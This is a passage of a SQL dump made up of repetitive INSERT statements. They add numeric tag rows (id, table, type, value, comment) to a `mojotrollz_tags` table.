VALUES (3471, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3471, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3472, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3472, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3473, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3473, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3474, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3474, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3475, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3476, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3476, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3477, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3477, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3477, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3477, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3477, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3478, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3478, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3478, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3478, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3478, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3479, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3479, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3479, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3479, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3479, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3480, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3480, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3480, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3480, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3480, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3481, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3481, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3481, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3481, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3481, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3482, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3482, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3482, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3482, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3482, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3483, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3483, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3483, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3483, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3483, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3484, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3484, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3484, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3484, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3484, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3485, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3485, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3485, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3485, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3485, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3486, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3486, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3486, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3486, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3486, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3487, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3487, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3487, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3487, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3487, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3488, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3488, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3488, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3488, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3488, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3489, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3489, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3489, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3489, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3489, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3490, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3490, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3490, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3490, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3490, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3491, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3491, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3491, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3491, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3491, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3492, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3492, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3492, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3492, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3492, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3493, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3493, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3493, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3493, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3493, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3494, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3494, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3494, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3494, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3494, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3495, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3495, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3495, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3495, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3495, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3496, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3496, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3496, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3496, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3496, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3497, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3497, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3497, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3497, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3497, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3498, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3498, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3498, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3498, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3498, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3499, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3499, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3499, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3499, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3499, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3500, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3500, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3501, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3501, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3501, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3501, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3501, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3502, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3502, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3502, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3502, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3502, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3503, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3503, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3504, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3504, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3505, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3505, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3507, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3507, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3508, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3508, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3509, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3510, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3510, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3511, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3511, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3512, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3512, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3513, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3513, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3514, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3514, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3515, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3515, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3516, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3516, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3517, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3517, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3518, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3518, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3519, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3519, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3520, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3520, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3521, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3521, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3521, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3521, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3521, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3522, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3522, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3523, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3523, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3524, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3527, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3528, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3528, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3529, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3529, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3530, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3530, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3531, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3531, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3532, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3532, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3533, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3533, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3534, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3534, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3535, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3535, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3536, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3536, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3537, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3537, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3538, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3538, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3539, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3539, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3540, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3540, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3541, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3541, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3542, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3542, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3543, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3543, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3544, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3544, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3545, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3545, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3546, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3546, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3547, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3547, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3548, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3548, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3549, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3549, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3550, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3550, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3551, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3551, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3552, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3552, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3553, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3553, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3554, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3554, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3555, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3555, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3556, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3556, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3557, 1, 1, 0, 'generated'); INSERT INTO 